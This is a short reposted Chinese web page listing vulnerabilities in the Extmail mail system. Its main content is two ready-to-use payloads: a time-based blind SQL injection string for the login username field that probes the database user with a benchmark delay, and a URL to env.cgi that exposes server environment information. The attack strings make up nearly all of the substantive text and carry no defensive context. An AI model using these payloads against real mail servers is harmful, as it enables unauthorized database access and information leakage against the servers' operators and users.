碼上歡樂
相關內容    簡體    繁體

應用安全 - 郵件系統 - Extmail - 漏洞匯總

本文轉載自   查看原文   2020-02-19 00:35   714 

前台SQL注入

payload(username處存在延遲注入):
admin' AND if(ascii(substring(user(),1,1))>104,benchmark(2000000,md5(0x72696e67)),1)%23

 

前台敏感信息泄露

payload:
http://xxx.xxx.com/extmail/cgi/env.cgi

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Linux下開源郵件系統Postfix+Extmail+Extman環境部署記錄 游戲郵件系統 java的郵件系統實現 調用IOS郵件系統發送郵件 Coremail郵件系統配置文件泄露漏洞 應用安全 - PHP - CMS - DeDeCMS - 漏洞 - 匯總 應用安全 - 平台 | 工具 - Nexus漏洞匯總 應用安全 - CMS - PHPCMS漏洞匯總 應用安全 - CMS - Discuz漏洞匯總 PostFix+Dovecot 部署郵件系統
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM